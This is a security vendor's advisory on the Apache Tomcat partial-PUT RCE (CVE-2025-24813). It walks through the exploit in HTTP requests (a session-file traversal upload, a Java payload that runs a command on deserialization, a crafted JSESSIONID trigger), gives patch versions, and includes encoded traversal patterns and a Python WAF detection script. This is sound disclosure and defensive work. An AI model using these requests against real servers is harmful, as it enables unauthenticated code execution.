[2025.04 Vulnerability Report] Apache Tomcat RCE Vulnerability (CVE-2025-24813)
Apache Tomcat is a Java-based web application server widely used worldwide, and a serious path equivalence vulnerability, identified as CVE-2025-24813, was recently discovered in it. Because of a path validation error in DefaultServlet, an attacker can access restricted resources or execute arbitrary code without authentication.
An attacker can bypass authentication with an HTTP request containing a specially crafted path and perform actions that are normally available only to authenticated users. In particular, this can lead to remote code execution (RCE) that takes full control of the system or runs malicious files, so companies and organizations using Apache Tomcat urgently need to apply the latest security patches.
Our AIWAF product continuously monitors for and detects, in real time, vulnerabilities that may occur in widely used open-source web servers such as Apache Tomcat, and responds to them with detection signatures and bypass pattern analysis so that preemptive defense is possible. We will continue to analyze similar path bypass and authentication bypass vulnerabilities and update our defenses accordingly.
1. Overview
Apache Tomcat is open source software, licensed under the Apache License Version 2, that provides a servlet container for running JavaServer Pages (JSP) and Java Servlets. It is widely used as the servlet container in commercial web application servers, and this report analyzes the RCE vulnerability found in it.
Source: https://tomcat.apache.org/
2. Attack Type
CVE-2025-24813 stems from the way Tomcat handles partial PUT requests and allows a remote, unauthenticated attacker to achieve remote code execution (RCE), view security-sensitive files, and inject content into those files.
- The attacker sends a PUT request to the server containing a Base64-encoded serialized Java payload, designed to trigger RCE on deserialization. For example:

  ```http
  PUT /uploads/check.txt HTTP/1.1
  Host: vulnerable-server.com
  Content-Length: 10

  testdata
  ```

- Create the Java-based payload. For example:

  ```java
  import java.io.IOException;

  public class Exploit {
      // Static initializer runs as soon as the class is loaded during deserialization.
      static {
          try {
              Runtime.getRuntime().exec("cmd.exe /c calc.exe");
          } catch (IOException e) {
              e.printStackTrace();
          }
      }
  }
  ```

- Generate the exploit upload request. For example:

  ```http
  PUT /uploads/../sessions/attacker.session HTTP/1.1
  Host: vulnerable-server.com
  Content-Type: application/octet-stream
  Content-Length: 1024

  <serialized payload data>
  ```

- Because of the directory traversal, Apache Tomcat incorrectly treats this file as a legitimate session object.
- After sending the above request, the attacker sends a GET request with a specially crafted "JSESSIONID" cookie that references the malicious session, causing the server to deserialize the payload and execute arbitrary code. For example:

  ```http
  GET /index.jsp HTTP/1.1
  Host: vulnerable-server.com
  Cookie: JSESSIONID=attacker
  ```
3. Response
CVE-2025-24813 is fixed by the security patches in Tomcat 9.0.99, 10.1.35 and 11.0.3; we recommend upgrading to these versions or later.
For this vulnerability, our WAF rules will be further analyzed and updated to address attacks that use encoded bypass paths such as /..;/, %2e%2e%3b/ and ;%2e%2e/.
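The normalization such a signature needs, shown as an added example in Python (not AIWAF's rule code and not part of the original report): requests are percent-decoded until stable and ';' path parameters are dropped the way Tomcat maps a URI, so the encoded variants above collapse to the same traversal, and the session-store write, the partial PUT and the non-Tomcat-looking JSESSIONID from the sequence in section 2 are each flagged. The sample requests and the ".session" suffix are constructed from the report's examples; the 32-hex-character session id format is Tomcat's default.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (method, path, headers) modelled on the report's
# PUT -> session file -> JSESSIONID sequence; not captured traffic.
SAMPLE_REQUESTS = [
    ("PUT", "/uploads/check.txt", {"Content-Length": "10"}),
    ("PUT", "/uploads/../sessions/attacker.session", {}),
    ("PUT", "/uploads/..;/sessions/x.session", {"Content-Range": "bytes 0-1023/1024"}),
    ("PUT", "/uploads/%2e%2e%3b/sessions/x.session", {}),
    ("GET", "/index.jsp", {"Cookie": "JSESSIONID=attacker"}),
]
# '..' as a whole segment, also when followed by a ';' path parameter (/..;/).
TRAVERSAL = re.compile(r"\.\.(?=[/;]|$)")
# Tomcat's default session id: 32 upper-case hex chars, optional ".jvmRoute".
SESSION_ID = re.compile(r"^[0-9A-F]{32}(\.[\w-]+)?$")

def decode_path(path: str) -> str:
    """Percent-decode until stable so %2e%2e and %252e%252e both yield '..'."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path

def strip_path_params(path: str) -> str:
    """Drop ';param' from every segment, as Tomcat does when mapping a URI."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))

def classify(method: str, path: str, headers: dict) -> list:
    """Return detection tags for one request; an empty list means nothing flagged."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    decoded = decode_path(path)
    mapped = strip_path_params(decoded)
    tags = []
    if method.upper() == "PUT":
        if TRAVERSAL.search(decoded):
            tags.append("put-path-traversal")
        if mapped.lower().endswith(".session"):  # write into the session store
            tags.append("put-session-file")
        if "content-range" in hdrs:              # partial PUT, the trigger in the report
            tags.append("partial-put")
    m = re.search(r"JSESSIONID=([^;\s]*)", hdrs.get("cookie", ""))
    if m and not SESSION_ID.match(m.group(1)):   # e.g. JSESSIONID=attacker
        tags.append("jsessionid-format-anomaly")
    return tags

if __name__ == "__main__":
    for method, path, headers in SAMPLE_REQUESTS:
        print(f"{method} {path}: {classify(method, path, headers) or 'ok'}")
```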
4. Conclusion
Apache Tomcat, a popular Java-based web application server used worldwide, was recently found to contain an RCE vulnerability identified as CVE-2025-24813. The vulnerability is caused by a path validation error in DefaultServlet, which could allow an attacker to access restricted resources or execute arbitrary code without authentication.
By sending an HTTP request with a specially crafted path, an attacker can bypass authentication and perform actions that normally only authenticated users can perform. This can lead to remote code execution (RCE), in particular to take full control of a system or run malicious files, making it urgent for organizations and institutions using Apache Tomcat to apply the latest security patches.
Our AIWAF products continuously monitor for and detect, in real time, vulnerabilities in widely used open-source web servers such as Apache Tomcat, and respond to them with proactive defenses based on detection signatures and bypass pattern analysis. We will continue to analyze similar path bypass and authentication bypass vulnerabilities and update our defenses accordingly.
5. References
- https://www.cyfirma.com/research/cve-2025-24813-apache-tomcat-rce-vulnerability-analysis/
- https://www.rapid7.com/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/
- https://www.recordedfuture.com/blog/apache-tomcat-cve-2025-24813-vulnerability-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2025-24813